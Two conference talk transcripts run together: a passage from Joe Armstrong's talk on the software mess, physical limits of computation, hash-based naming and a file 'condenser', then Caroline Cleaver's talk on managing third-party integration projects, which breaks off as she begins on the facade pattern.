Contribute to existing stuff. Now is not the time to be inventing new functional languages, because that was done a while back; that was done in the 80s. So if Apple wanted to do something, make a Cocoa bridge to Haskell or to Erlang, so that we can really use Cocoa and the nice GUI stuff.
Don't make your own thing, because you don't have all the libraries. You don't have all the stuff going. Right, names. How are we doing for time? Golly. I have to speed up. Names. We name things. Names are imprecise. It's terribly difficult deciding on names. Unique names. I'm called Joe. Any other Joes? No. So Joe's unique in this namespace. But in a bigger namespace, there are lots of Joes. I'll talk more about that later. It's the root of all evil. Right, now I'm changing subject. This is light relief, because I'm an ex-physicist. What do the laws of physics have to say about computation? Any other physicists? Good, thank you. Right. So my interest in this was piqued when I was reading the Erlang manual pages, for the function that makes a unique reference. It said: the returned reference will reoccur after approximately 2 to the 82 calls, and therefore it is unique enough for practical purposes. I just wondered what this sentence meant. Well, 2 to the 82, that's about 10 to the 25. Sometimes I use 2 to the, sometimes I use 10 to the. What do these numbers mean? Right. So in this physics bit, I'm going to talk about causality, simultaneity, entropy, speed of computation, and storage capacity. Causality: to a physicist, a cause must precede an event. We communicate through messages - rays of light, sound waves. You hear what I say a couple of milliseconds after I've said it. You see my arms waving about before you hear what I say; your brain sorts that out, so you think it's simultaneous. Information travels at or less than the speed of light. You don't know how something is now. You know how it was the last time you talked to it. So, simultaneity - this is basic physics. We've got two stars, A and B, in different parts of the universe, and they explode at the same time. We've got three observers, and they look at that.
Well, this bloke over here is nearer to A than B, so the light from A gets to him first, and he says A exploded before B. The guy to the far right says B exploded before A. And the guy in between says they happened at the same time. So physicists gave up the idea of simultaneity a long time ago. As soon as you realize that light travels at a finite speed, the whole notion of simultaneity vanishes from physics. You're not allowed to talk about simultaneity. So put it into computer terms: try to replicate data. Suppose you've got a server A where you store something and a server B where you keep a replica. If you update X on A, you send X equals 10 to B and it replicates it. It sends an ack back to A. The trouble is that B doesn't know that A knows the value is replicated, because it doesn't know whether the ack signal got there or not. You can't make any assumptions about that. So if B wished to know that A knew it had the same value, you'd have to send an ack of the ack back from A to B. But then A doesn't know that that ack got to B, and so on forever. This is the two generals problem, and it's a very simple impossibility proof: when you've got data in two different places, there is no protocol that can determine that they're the same. You're violating the laws of physics if you say they're the same. What does that mean? It means that two-phase commit doesn't work. It actually means that three-phase commit doesn't work. Well, it actually means that infinite-phase commit doesn't work. So you can't have data in two places and know that it's the same. It's a law of physics, which we break a lot. It's not a good idea breaking the laws of physics. They're there for a good reason. Entropy always increases. Entropy is the amount of disorder in a system.
If you take a load of dice and chuck them up in the air, they're not all going to land with one up, or all sixes. They're going to become more and more disordered. This is the second law of thermodynamics: entropy always increases. In software terms, it means systems become more disordered all the time as you build them. It's a law of physics. Speed of computation. This is quite fun. Who are these guys? That's a little quiz. Who's this guy? Sorry? Yes, that's right, that's Albert Einstein. This is Hans-Joachim Bremermann. Who's this guy? No? Yes, Planck, Max Planck. Max Planck is one of the fathers of quantum mechanics. One of his relationships is E equals h nu: the energy of a black body radiator. A black body radiator radiates at different frequencies, and the energy at a particular frequency is Planck's constant times nu. OK, so that's one of Planck's relationships. And Einstein said, well, E equals m c squared - everybody knows E equals m c squared - that's the amount of energy in a given mass. So Professor Bremermann said, well, if E equals h nu and E equals m c squared, then h nu is m c squared. Just knock out the E, and nu is m times c squared over h. So c squared over h is called the Bremermann limit, and it's 1.36 times 10 to the 50 hertz per kilogram. OK, so that says that one kilogram of anything - it doesn't matter what it is - can oscillate at a maximum of about 10 to the 50 cycles per second. That's an upper limit on how fast an oscillator can run. That's the clock frequency of a kilogram of stuff. It can't go faster than that, due to quantum mechanics. Right. So not only is there the Bremermann limit, there's also the Margolus-Levitin theorem, the Bekenstein bound, and the Landauer limit. We're all familiar with these? So I'll just go through them very quickly, because they tell us important things about computing.
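The Bremermann arithmetic above (nu = m c squared over h) takes a couple of lines to check. A minimal sketch; the constants are standard CODATA values:

```python
# Sanity-check Bremermann's limit: nu = m * c^2 / h.
c = 2.998e8        # speed of light, m/s
h = 6.626e-34      # Planck's constant, J*s

def bremermann_limit(mass_kg):
    """Upper bound on the 'clock rate' in hertz for a computer of this mass."""
    return mass_kg * c**2 / h

# A one-kilogram computer:
print(f"{bremermann_limit(1.0):.2e} Hz")   # roughly 1.36e50 Hz, as on the slide
```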
So the Bremermann limit says the maximum clock rate of a one-kilogram computer is 1.36 times 10 to the 50 hertz. The Margolus-Levitin theorem relates computation to energy: we can do about 10 to the 33 operations per second per joule. The Bekenstein bound tells us how tightly we can pack information: about 10 to the 43 bits per kilogram per meter - you take the mass of the thing and the radius of the sphere, and that's the maximum. And then the Landauer limit, the minimum energy to change one bit of information: 2.85 zeptojoules at 25 degrees. I had to look up what a zeptojoule was - it's 10 to the minus 21 of a joule. There's another unit I just invented: the FBDC, a Facebook data center. That's 28 megawatts, so a Facebook data center is 28 times 10 to the 6 joules per second, and the Landauer limit is about 10 to the minus 21 of a joule. So you see this 27 orders of magnitude difference. Of course, the Facebook data center isn't doing just a one-bit operation; it's doing lots of bit operations. But you get some idea from that. So let's build the ultimate laptop and see what that is. Well, as you add more and more components, it gets hotter and hotter and the component density gets greater and greater. The logical conclusion is that the ultimate laptop is a black hole: we've squashed all the stuff into it, and it runs at the Bremermann limit, at about 10 to the 51 operations per second. So you think, well, this is bloody useful, I can do a lot with that. But there's a problem. It's pretty small - it's 10 to the minus 27 of a meter big, so you might drop it and not be able to find it. It's got a storage capacity of about 10 to the 31 bits. And above all, it lives for 10 to the minus 21 of a second. So yeah. But it's done 10 to the 31 computations during that time. And you might ask, how does the answer get out?
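As an aside, the Landauer figure quoted above is just as easy to verify: the minimum energy to erase one bit is k T ln 2, where k is Boltzmann's constant. A quick sketch:

```python
import math

k_B = 1.381e-23          # Boltzmann constant, J/K

def landauer_limit(temp_kelvin):
    """Minimum energy in joules to erase one bit at the given temperature."""
    return k_B * temp_kelvin * math.log(2)

energy = landauer_limit(298.15)   # 25 degrees Celsius
print(f"{energy:.2e} J")          # about 2.85e-21 J, i.e. 2.85 zeptojoules
```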
Stuff falls into black holes, but it can't get out - you might have heard this. Well, that's not quite true. Stephen Hawking found there's something called Hawking radiation that comes out of a black hole when you drop stuff into it. So if you take an elephant and drop it into a black hole, you get an elephant's worth of energy coming out of the black hole. But how does it come out? Oh, there's a picture - a nice picture from Scientific American. What happens is that outside the black hole, things falling in split into pairs: particles and antiparticles. Say one of them drops into the black hole. They're split pairs, so their spins and things are equal and opposite. And provided nobody measures them or does anything, you're fine. When you change the spin of the thing inside the black hole and somebody measures its partner outside, it instantaneously has that value. It's called quantum entanglement. Einstein called it spooky action at a distance - he didn't believe in it, actually. So there's a kind of technical problem: how to encode our program, drop it into a black hole, and have the answer instantaneously appear, due to quantum entanglement, somewhere else in the universe. These are technical problems which I leave to future programmers and physicists. I'm not quite sure how to make it work. Oh, hang on - that was the ultimate laptop. What's the ultimate computer? Well, that's the entire universe behaving as a black hole, right? A black hole computer - that's the ultimate computer. So we could ask the question: how many operations has the universe done since it was booted? You boot the universe and you wait 10 to the 10 years - about now - and it's done about 10 to the 123 operations since then, as a quantum computer. Its size is about 2 times 10 to the 26 meters, and it will live for 10 to the 10 to the 100 years. Well, that's a googolplex.
Nobody really knows - it'll cool down and die, I suppose, I don't know. So that gives you some sort of scale: the number of operations the entire universe, working as a quantum computer, has done since it was created is, what did I say, about 2 to the 409. If you wanted to crack a crypto key by systematic search of all keys, and you've got a 512-bit key, and you could try one key per clock cycle, it would take 2 to the 103 universes to do it. Cryptographers actually use measures from quantum mechanics to set the upper bounds on the complexity of the algorithms. So you don't need infinite-length keys; you just need to set them in relation to the size of the universe, and then you're fine. There are some papers to read - there's a very readable article in Scientific American about black hole computers. Fun facts and figures. Oh, this is wrong, I noticed: one kilogram can do 10 to the 51 operations per second and store 10 to the 31 bits, and I wrote that it's a 10 gigahertz machine - it's obviously much, much more than gigahertz. I mean, it's fast. It's faster than this thing, anyway. A conventional computer can do 10 to the 9 operations per second, if you compare it to the black hole computer. And the universe can store 10 to the 92 bits of information. Multiply 92 by about 3.3 and you get roughly 300, so the number of bits in the universe is about 2 to the 300. So with a 300-bit checksum, you're about on par with the number of bits you can store in the universe. SHA-1 is 160 bits - not enough if you want to store a checksum of everything in the universe, but probably good enough for the earth. It may be all right. I have to think about that. Exercise: how many bits should a checksum have to uniquely identify every atom on the planet? Answers on the back of an envelope.
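A possible back-of-envelope answer, taking the commonly quoted estimate of about 1.33 times 10 to the 50 atoms on Earth (my figure, not one from the talk):

```python
import math

# Assumed figure: the Earth is commonly estimated to contain ~1.33e50 atoms.
ATOMS_ON_EARTH = 1.33e50

# Bits needed to give every atom a distinct label.
bits_needed = math.ceil(math.log2(ATOMS_ON_EARTH))
print(bits_needed)   # 167 -- so SHA-1's 160 bits is marginal for the Earth
```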
Golly, I have to speed up. So we've created all this mess, and we've got the laws of physics. What are we going to do about it? Right, so I have a little proposal here. We've got to reverse entropy - we can do that if we put energy into the system. We've got to build the condenser. The condenser should be a bit like a meat mincer: you put all the files into it, you turn the handle, and fewer files come out. So we condense. You see, what we've been doing in the past is expanding the amount of information. So let's reverse that. We're just breaking the second law of thermodynamics, which is allowed if we put energy into the system. That's fine. Why did the number of files increase? Well, you start off with files and you make more: you take a file and you edit it and you do this and you do that. That's entropy increasing. Files mutate. And disks are really huge. Every time I buy a new computer, I just copy all the stuff I had on all my old computers onto it. A complete mess - I can't find anything on it. I've got 43,000 Erlang files on my machine, and I can't find anything in them. Then you have a file, you've got some data, and you say: well, I wonder what file name I should give it. I don't know. I wonder what directory I should put it in. I don't know. I wonder which machine I should store it on. I don't know. And that problem gets worse and worse as you have more and more files. It gets far worse when the system becomes distributed. Right. So I want to declare the war on names. You know, there's the war on terror, there's the war on poverty. We programmers should declare the war on names. Git's quite good - it's declared the war on names nicely. So we shouldn't have any names. A few examples. To talk about things, they need names. We can't talk about something if we can't name it. It's a basic philosophical fact. OK. So here's a paragraph of text. Cup of tea.
He sat down, cut and buttered a slice of toast. He tore away the burnt flesh and flung it to the cat, and so on. What's that from? I know, you'd use Google. Any guesses? It's James Joyce, from Ulysses. Because that paragraph has no name, we can't talk about it. So let's name it. Well, it's not really a name - we just compute its SHA-1 checksum. Right. The name of that paragraph is 79915...0AD. Given that name - it's not really a name, it's a hash - I can tell anybody: I'm talking about 79915-blah-blah-blah. We've uniquely named this. There's no ambiguity whatsoever. Right. So imagine we do away with these URIs. They are evil. Well, they're not a silly idea - they're OK as a first approximation to the truth. Look at this thing. It's got two parts: a host name, which you look up with DNS, and a resource name. Well, DNS can be spoofed. A naughty person can put a false entry into DNS or send you to the wrong DNS server. And if the resource is changed, the reference is wrong: you found a reference to some resource in a file, somebody changes the content of that resource, and you've still got a reference to the old version but you get the new one. If you put a time-to-live on it for caching, you wouldn't know what time to put in. Suppose you put it in a cache with a time-to-live of 10 minutes and the guy changes it after five minutes - you can't invalidate the cache. There are all sorts of problems with this. And the content can be changed by a man in the middle: bad guys can listen to this stuff and change the content. So we don't want this at all. So let's do it like this. Instead of having a URI, we'll make a new type of thing. We'll just say hash, and then the name. Notice there is no host name.
There's just the hash of the content. The nice thing about this is you say: go find the blob that has this hash. No man in the middle can attack it, because when you get the blob back, you compute the hash and check that it is what you asked for. No man in the middle can change it. No DNS spoofing can affect it. If you get an answer, it's what you asked for. It is completely safe. It doesn't need any crypto keys to be exchanged, it doesn't need to be protected from man-in-the-middle attacks, it doesn't need anything like that. So then the question is: how do we find this thing, given that we haven't said which host it's on? Well, that's a well-solved problem. Think about how DNS works: when you boot your machine, you've got a couple of start addresses in a cache - DNS1 and DNS2 - and you go and ask those two addresses. In a peer-to-peer system, you've got a long list of machines that are known to participate in a distributed hash table. Suppose I know about these machines here - here are the IP addresses of machines that are participating in a peer-to-peer distributed hash table. What you do is compute the SHA-1 checksum of each of these IP addresses and sort them all. And then you say: OK, I've got this resource, I want to find something with this hash - where is 536852? You look in the list and say, well, it's somewhere near these two machines here that I've highlighted. They're the nearest machines in this space to that hash. So I go and ask them. And they've got lists like that, and they'll find the nearest ones, and they'll go and ask them, and so on. OK, so this is the basis of Chord and Kademlia and algorithms like that. These are well-understood algorithms.
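Both halves of this - naming content by its hash, and finding which nodes are responsible for a given hash - fit in a few lines. A deliberately simplified sketch (real Kademlia uses an XOR distance metric and iterative routing; plain numeric distance is enough to show the idea, and the sample IPs are made up):

```python
import hashlib

def sha1_int(data: bytes) -> int:
    """SHA-1 digest as an integer, so hashes can be compared numerically."""
    return int(hashlib.sha1(data).hexdigest(), 16)

def content_name(blob: bytes) -> str:
    """Name a blob by its SHA-1 digest: identical content, identical name."""
    return hashlib.sha1(blob).hexdigest()

def nearest_nodes(resource_hash: int, node_ips, k=2):
    """The k node IPs whose hashed addresses lie closest to the resource hash."""
    return sorted(node_ips, key=lambda ip: abs(sha1_int(ip.encode()) - resource_hash))[:k]

paragraph = b"He sat down, cut and buttered a slice of toast..."
name = content_name(paragraph)     # 40 hex digits; any copy of the bytes hashes the same
nodes = ["10.0.0.1", "10.0.0.2", "192.168.1.7", "172.16.0.9"]
print(name)
print(nearest_nodes(sha1_int(paragraph), nodes))   # who to ask for this blob
```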
The Kademlia network has something like 9 million machines. It was actually popularized by the file sharers, who use it to share movies and things like that. But it works great. So we could put all information into this - not just movies; put all information into it. Right. So here's how to make the condenser. The first thing we want to do is find all identical files, then find all similar files, and reduce the amount of information on the Internet. Well, finding all identical files on the Internet is trivial. We compute the SHA-1 checksum of each file and inject it into the hash table. That's all we have to do. You can do that on all the machines in the world, running in parallel. We could do this in a few hours and get rid of all the replicas. That's what Dropbox does, I think: if stuff you put in there has the same checksum, they don't keep multiple copies - just two or three for redundancy. Right, so that's the finding-all-identical-files bit. Now we want to find all similar files - find the most similar file to a given file. This is a tricky problem. I've been thinking about this for ages. The best algorithm I know - I'll just tell you the answer - is called least compression difference. If two things are similar, then if you concatenate them and compress them, the result is barely bigger than one of them compressed alone. You've got a file; you compress it; it's got a certain size. If you took the file twice, concatenated it, and compressed it, the compressed size would be only a little greater, because the second copy is just described as the difference - and there is no difference. So if you take a file, concatenate it to itself 100 times, and compress it, it's about the same size as the file compressed by itself. And two files that are totally dissimilar - random data, say - behave the opposite way.
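The least compression difference test can be sketched directly with zlib. A hedged sketch - the ratio below is my own normalization, and the sample data is made up; the point is only that similar inputs compress together cheaply:

```python
import zlib

def csize(data: bytes) -> int:
    """Compressed size in bytes."""
    return len(zlib.compress(data))

def compression_distance(a: bytes, b: bytes) -> float:
    """Smaller means more similar: compressing similar things together
    costs little more than compressing each one alone."""
    return csize(a + b) / (csize(a) + csize(b))

doc = b"the quick brown fox jumps over the lazy dog " * 50
near = doc.replace(b"quick", b"slow")   # a lightly edited copy
far = bytes(range(256)) * 10            # unrelated data

# The edited copy should score as closer to doc than the unrelated data.
print(compression_distance(doc, near) < compression_distance(doc, far))
```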
If you compress A, and you compress B, and you compress A concatenated with B, then for two totally dissimilar files the size of the last one will be more or less the sum of the other two. So this measure finds the most similar thing, and it's very insensitive to changes in the compression algorithm. I have a thing on my machine: when I've got some information, I type it into a little box, like Twitter, and I press the Sherlock button - Sherlock Holmes, there's a little icon. It does least compression difference over most of my files. It takes a long time. Then it says: hmm, do you know, the most similar thing to that was something you did 15 years ago, and it's in this file. It finds it for me. I want that to work over the entire internet. I want us to put all the information we've got into the internet so that we reduce the amount of information - we reverse entropy and make it more manageable. OK. This takes order n time, where n is the number of files on the planet, so it's not super quick. I'm just wondering if we can speed it up. We'd have to reduce the search space. I don't really know how to do that - I'd like to talk to some researchers who do - but there's a little hint: we certainly know some things couldn't be similar because they're very different sizes. Do you know how the plagiarism detection algorithms work? They work on a rolling checksum. There are databases of open source software and of the essays students write for their theses. What you do is take the source code, or the student thesis, chop it into 50-byte blocks, and compute a checksum of each block - not an MD5 or SHA-1, sorry, it's called a rolling checksum - and stick that in a key-value database. A rolling checksum is one where you take 50 bytes, compute the checksum, and when you shift the window by one byte, you can incrementally update the hash.
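That incremental update can be sketched in a few lines. Here a plain XOR stands in for the stronger rolling hashes (Rabin fingerprints, Adler-style sums) that real systems use - it's the toy version the talk describes:

```python
from functools import reduce
import operator

def rolling_hashes(data: bytes, window: int = 50):
    """Yield an XOR checksum for every window-sized block, updated
    incrementally: XOR out the byte leaving, XOR in the byte entering."""
    if len(data) < window:
        return
    h = 0
    for b in data[:window]:
        h ^= b
    yield h
    for i in range(window, len(data)):
        h ^= data[i - window]   # remove the byte sliding out of the window
        h ^= data[i]            # add the byte sliding into the window
        yield h

data = bytes(range(200))
hashes = list(rolling_hashes(data))
# Sanity check: the incremental hash matches recomputing from scratch.
assert hashes[10] == reduce(operator.xor, data[10:60])
```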
A simple one is to XOR all 50 bytes. When you shift by one byte, you XOR out the byte that left and XOR in the byte that entered, and now you've got the checksum of the next block. That's called a rolling hash. So you take your data, split it into 50-byte blocks, compute the rolling hash, and stick the hashes in a Kademlia-style distributed hash table. Then you take a 50-byte block and look it up in the hash table. If it's in there, that block could possibly be the same - so you go and look at it and see if it actually is. You can do that in linear time per document. It needs order n lookups, where n is the number of bytes in the file. That's reasonable - you could probably do it fairly quickly, I think. Right. Summary. We made a mess. A horrible mess. We've created millions and trillions of man-hours of work. In order to get out of this mess, we need to reverse entropy and start making things simpler instead of more complicated. Quantum mechanics sets the limits to the precision - the number of bits we need in checksums and things like that - so we can dimension our systems accordingly. We would love some mathematics to prove things; I think we're going to have to wait a long time for that. So join the war on names and help me build the condenser. That's the next five years' job. Thank you very much. Any questions? Where do I buy a quantum computer? You can't. And wouldn't a black hole computer be dangerous? Possibly. Different problem - Google it. No more questions, then. Get to work.
Software is a mess. In the last 40 years I and my colleagues have been writing buggy, unspecified, and difficult to maintain software. By doing so we have created an entire industry. We have collectively created billions of lines of unmaintainable unspecified code that will require millions of programmers to work for thousands of years to correct the mess we've made. Where did things go wrong? Can we make things work again? Should we admit we were wrong and throw all our legacy software away and start again? How can we make correct software, that is easy to understand and maintain? I don't pretend I can answer these questions - but I have some idea as to what went wrong, so maybe we can learn from our mistakes. In this lecture I'll talk about some of the biggest mistakes we made and what we can learn from these.
10.5446/50611 (DOI)
Hi everyone. My name is Caroline Cleaver. I work as a developer at Epinova. I'm here today to talk to you about the integrations we fear and how we can manage them. Have you ever thought about which integrations you fear? Because I have. I've given it quite a lot of thought. And it's not just because of this presentation. It started about two years ago. I was working on a project with quite a lot of heavy integrations. And I kept recognizing this really bad feeling. I didn't want to work with it. And I couldn't figure out why. So what I did was that I tried to identify this feeling. And there were several of them, so I tried to categorize them to figure out what it was. And I came up with four fears. Four fears that I have when it comes to integration projects. And I'd like to take you through these before I move on to looking at how we can manage them, just so that you all have the basis for this talk and you know where I'm coming from. So what do I fear? Well, the first thing I fear: I fear badly written APIs. You know those APIs that look like they're written by a person who's never ever seen an API before. I fear those. And I have an example here from that project that I worked on two years ago. I was given quite a large set of web services. And I was even told, for quite a lot of those web services, which methods I had to use. So you would think that this would be an easy job, right? It would be a walk in the park. You had everything you need. You had the web services. And you even knew which methods. But then I sat down and I had a look at this API. And this is what I saw. The method that I was supposed to call was called get changes. And there are five different get changes methods. And they're all prefixed with bullshit. You have the new get changes. You have the old get changes. The old new. And the test get changes. And I mean, what do you do? You can't tell them to rewrite their APIs. Or you could try.
But probably they're going to say no because they don't have the time to do this. And you have to use it. But you have to make sure that when you're using APIs like this, the lack of quality from that API does not infect your code. So that's my first fear. My second fear is that I fear heavy payloads. If you're giving me data, I want to receive only the data that I need. I don't want your complete database. I just want the data that I need. And I want to tell you which data I need. Because heavy payloads, they often come with performance issues. And I hate performance issues. I hate debugging them. I hate everything that comes with performance issues. So that's why I fear heavy payloads. And I have an example here as well from a recent project of mine where I'm receiving quite a lot of data as XML. And the example you see here is only a small part of it. These XML files are quite large. And what you see here is that you have an entity element. An entity element contains quite a lot of different attributes. And every single attribute contains a product ID, organization ID, version, and language. Now, the parts marked in yellow, they are identical for every single attribute. There's no need to put this on the attribute. Why isn't this on the entity element instead of on every single attribute? If you have lots and lots of data like this, the heavy payload might contribute to performance issues. So that's my second fear. My third fear is that I fear unnecessary complexity. And I'm not just talking about code here. I'm talking about every single step of the project, whether it's complex communication, whether it's complex architecture, whether it's the code that's complex. Unnecessary complexity is not anything you need in an integration project because integrations in themselves are complex. So you need to remove any unnecessary complexity. And then my fourth fear is that I fear third-party vendors who are not willing to cooperate.
And you would think that if someone created an API, they would want other people to use it, right? I mean, why do they have an API if they don't want people to use it? But in a lot of cases, as soon as you start questioning about them, about their APIs, they don't want to talk to you. And I was in a meeting about six months ago with a customer. I work as a consultant. So I was in a meeting with a customer and a third-party vendor. And we were discussing how to solve a problem. Before the meeting, I had read the documentation for the third-party vendor API, so I knew that I could use or I could solve this problem if I could use their APIs. Halfway into the meeting, we'd been sitting there for about 30 minutes. They still hadn't mentioned this API, so I just had to ask them. And I asked them, well, can't I just use your API? If you let me use your API, then I can fix this. Problem solved. And the woman that was sitting across from me at the table, she looked at me and she said, you know what? We'd rather you didn't use our APIs as they require about 200 hours of training. I was shocked. I mean, if your API requires about 200 hours of training, it's either a really badly written API or your domain is so complex. And I wanted to tell her that I could probably rewrite her API in about 200 hours, but you can't say that in the middle of a customer meeting. What you do is you tweet it instead. And then you have a presentation about it. So these are my four fears. I fear badly written APIs. I fear heavy payloads. I fear unnecessary complexity. And I fear third party vendors who are not willing to cooperate. Now, how do we manage these? That's what I'm going to talk about for the next 15 minutes or so. But before I go into how we can manage them, I'd like to ask you why? Why do we need to manage these integrations? Well, integrations, they come with complexity. I already told you that. 
But as soon as you decide to integrate your application or your system with a different system, you're increasing the complexity. And increasing complexity means that you're increasing the risk. You're increasing the risk of something going wrong. You're increasing the risk of not finishing on time because there were just too many unknowns that you were not able to foresee. Or you're increasing the risk of new bugs because adding an integration means adding more code. And as we all know, when we write more code, we also write more bugs. So you're adding risk. And that's why we need to manage them. So I like to divide integration projects into two different phases. There are two of them: a setup phase and an implementation phase. The setup phase is every single thing you need to do before you can start writing code. The implementation phase starts the second you start writing that code. And what I like to do is take you through both these phases, step by step: what do you need to do? How can you make sure that your integration projects are going to be as easy as possible and as maintainable in the future as they could be? So let's start with the setup phase. I already told you that the setup phase involves every single thing you need to do before you can start writing code. So imagine that your project manager or your project architect comes to you and says, I want you to integrate our application with this system over there. That's all the information you have. What do you do? Well, the first thing you need to do is that you need to figure out who to talk to. There's someone at the third party vendor who created this API that you're going to use. And you need to figure out: who is this person? Who can I talk to when I have trouble? And I'm going to say when, because that's the case in a lot of integration projects. There is no if. There's a when. You're going to run into trouble at some point.
So you need to figure out who can answer my questions. And there are several ways of communicating, and you can communicate the hard way like this, where you have a question. So you go to your project manager. Your project manager goes and talks to the account manager at the third party vendor. The account manager goes and talks to their project manager, who in the end goes talking to some tech guy, and he's the one who can answer your questions. Now, if one of these people is on vacation, you're screwed. And these three people in the middle, they're not technical. They might turn your question into some buzzword mumbo jumbo. So what you want to do is that you want to reduce the complexity of communication. You want to cut out all the unnecessary parts. You want to talk directly to the person who can help you. There's no point in talking to all the people in the middle. And if your project manager feels the need to know everything that you do and to make sure that every single question you have goes through him or her, then you have a trust issue, and you need to focus on that before you start communicating with other people. So as long as you're able to update your project manager frequently on what you're doing and how the communication with the third party vendors is working, this should be a good way to do it. Now, of course, you need to make the third party vendor agree on letting you communicate like this. And from my experience, the worse the API, the more people you have to go through to get the answers. But this is the goal. This is the ultimate goal. You want to talk directly to the people who can help you. Now, as soon as you know who to talk to, you should figure out how you'd like to communicate because there's nothing more annoying than being in the middle of some problem, in the middle of some code, and your phone keeps ringing all the time. So figure out how you communicate. Do you call each other? Do you write emails?
Do you have meetings, video conferences? Just get that covered so that everyone knows how to communicate. And then there's one last thing you should do that's really simple, but it's the most effective thing you could do at this stage. And that is to ask one question. Ask them, is there anything you need from me? Even though you know that there's nothing they need from you, ask them that question because showing them that you're willing to help is probably going to make them more willing to help you in the future. That's when you really need it. So now you know who to talk to, you know how to communicate. Now you should ask for the documentation. If you don't ask for documentation, if no one asks for documentation, there's no reason for them to keep the documentation updated. And as we all know, outdated documentation is worthless. There's no point in reading outdated documentation. So you should ask for it. And then you're going to read it. I'm sorry, but you have to read it. There are a lot of things you cannot figure out on your own. A lot of developers, they receive an API and they think, oh, great, I'm going to figure this out. And they start looking at the code. And in a lot of projects, that's going to work out fine. It's going to work. But not always. And if you do that with one of the APIs where it won't work, then you're screwed. If you've ever worked with the Microsoft Dynamics CRM Web Services and read that documentation, that documentation contains a lot of information about the different ways you can do things. They tell you you could do it this way. And your code is going to be very customizable, but it's not going to be very efficient. And then they're going to tell you, or you could do it this way. It's going to be really efficient, but you can't customize it. And when we're talking about efficiency and performance, this is not something you can figure out by just looking at an API. This is what you need documentation for. 
So make sure you read the documentation. And then you should agree on jurisdiction and specification. If you watched any cop movie during the 90s, you're going to see some poor murdered guy lying there. And the police department from one district shows up, coming to investigate this murder. And then the police department from the neighboring district, they show up an hour later. And they're always fighting about whose jurisdiction it is. It's my jurisdiction, it's mine. In development, it's the opposite. We don't want jurisdiction. What we're doing is telling them, this is not our bug. It's the guy over there. He created this bug. So you have to go talk to him. And the guy over there, he's pointing his finger at you. And while you guys are playing the blame game, pointing fingers at each other, there's no one fixing the bug. Now, this is why you have to agree on jurisdiction in the beginning, before you start writing code. Because every single party, every person who's involved in the project, they need to know their responsibilities. Who's responsible when this stops working? Who's responsible for this part of the system? Who's responsible for communicating with whom when something goes wrong? You should figure this out. And then you should make sure that everyone has read the specification. Make sure that everyone's on the same page. Because if you have a lot to do during your project, and the customer or the product owner comes to you and says, could we just add this tiny little feature? What they don't understand is that their tiny little feature is actually a massive job for the developer. And you tell them, I'm sorry, but it's not part of the specification. There's no way we can make that happen before the deadline. And then they go talking to the third-party vendor. And the third-party vendor, they don't really have a lot to do. They have some spare time, I mean, no one's using their APIs.
So they say, yeah, sure, we can fit this in, because they haven't read the specification. So now you're the bad guy who didn't want to add the feature. But now you're forced, because one of the other parties of the project said yes. So make sure that everyone reads the specification. Make sure everyone knows what you're doing, what's part of this project, and what's not. Now, it's time to get a bit more technical. We're almost getting to the code, but we have a couple of things left that we have to do. Now, you have to get access to everything you need. When you're working with integrations, you're probably going to need access to something, whether it's access to an application, to a server, whether it's needing a license or a username and password of some sort. You should get access to all of those things before you start writing code. Because there's nothing worse than starting to write code, and then you have to stop for a couple of days, just because you didn't have everything you need. So make sure you have that covered before you start writing code. And when someone sends you an email saying, here's the server you're going to have to log into, and here's your username, we'll send you an SMS for the password, make sure that you actually test that you have the access they say you have, because that's not always the case. So don't just archive the email, check that you actually have the access that you need. And then, last but not least, this is a given for most developers. Give me a test environment. There's no way I'm going to code against the production environment, because I want to be able to create data, I want to delete it, I want to update it without pissing anyone off. So give me a test environment, and make sure that that test environment is identical to the production environment. And you'd think that that would be a given as well. But in the project a couple of years ago that started this whole bad feeling and all my fears, that was not the case. 
The test environment worked, but as soon as we moved it out into production, it turns out the test environment and the production environment were not the same. It cost us a lot of headache. So demand a test environment and make sure that it's identical to production. Now, this is all you need in order to start writing code. You have everything you need now. You've agreed on what you're supposed to do, on how you communicate, you have access to everything you need. Now, there's one last thing I'd like to mention before we start getting a bit more technical, and that is that the setup phase, the most important part of the setup phase is that you have to start setting up as soon as possible. And I think this is where a lot of integration projects go wrong, because developers, we love writing code. That's what we want to do. So we don't start setting up soon enough. Imagine that this is your future. You're working on a current task. When you finish this task, you're going to do some kind of integration. And then after that integration, you have one single something else task, and then you reach your deadline. That's it. Now, what a lot of developers do is this. They finish the task they're working on right now, and then they forgot that there was a setup phase. They forgot how time-consuming it was to figure out all the responsibilities, the specifications, the communications, so that by the time they can actually start coding, they're already delayed. And by the time they finish their implementation phase, they have to choose, do I cut out that last something else task, or do I go past my deadline? So what you have to do is that you have to start setting up in parallel. As soon as you know that you're going to do an integration of some sorts, you should start setting up. 
So what you're doing is setting up in parallel to the task that you're working on right now, so that when you're finished with the task you're working on, you can actually start coding immediately afterwards. And you're still going to have time for that something-else task, and you're going to reach your deadline. So if there's anything you're going to remember from this presentation, it's this: start setting up as soon as possible, because you don't want to spend more time than necessary doing that. Now, just to show you how time-consuming communication can be, I have an example here from a recent project of mine. Now, in this project, we were receiving what they called gadgets. A third-party vendor was supplying us with gadgets. What they were was just simple JavaScripts that inject HTML onto a web page. But they weren't only injecting HTML, they were also injecting quite a lot of CSS, which was making the website look horrible. So what I wanted was for them to remove the CSS, and I sent them an email, because that was how we communicated, and I told them, could you please remove the CSS? And I expected them to email me back sometime within the same day, telling me, okay, it's gone. But no, no, that didn't happen. What happened was that I had to send 22 emails, and it took them 15 days to remove a CSS file. And this is how time-consuming communication can be when communication is not working. And trust me, picking up the phone didn't work either. So sometimes communication can be so time-consuming that there's no way you could have included it in your estimates. And that's one of the reasons you have to start setting up as soon as possible. Now, let's move over to the fun part. Let's do the implementation phase. This is where we start writing code. Now, is the way you write code in an integration project any different from how you write code in any other project? No, it's not. Or it's not very different, at least.
As long as you follow the SOLID principles, you write loosely coupled code, it's testable, and you care about your code, then you're going to be fine. Your code is going to work, just as it would in any other project. But the four fears that I mentioned in the beginning, my fear of badly written APIs, my fear of heavy payloads, my fear of unnecessary complexity, and my fear of third-party vendors who are not willing to cooperate, those all contribute to one thing. They make integration projects extremely hard to maintain. If you've been there from the beginning, I mean, if you're the developer on this project, you have all the background information, you have the domain knowledge, you've been there from the start, so you might not find the project hard to maintain. But the poor guy who's going to take over this project in two or three years, he doesn't have that same knowledge that you have, and you have to make sure that this project is going to be easy for him to take over, easy for him to maintain as well. So there are three things that I like to focus extra on when I'm working on integration projects, three things that make the project more maintainable, or easier to maintain. Those three things are the facade pattern, integration testing, and logging. So I'm going to take you through all three of them. I only have time to touch on the basics; these are definitely things you should look into a lot more when you're working with integrations. So let's start with the facade pattern. The facade pattern is actually a pattern that 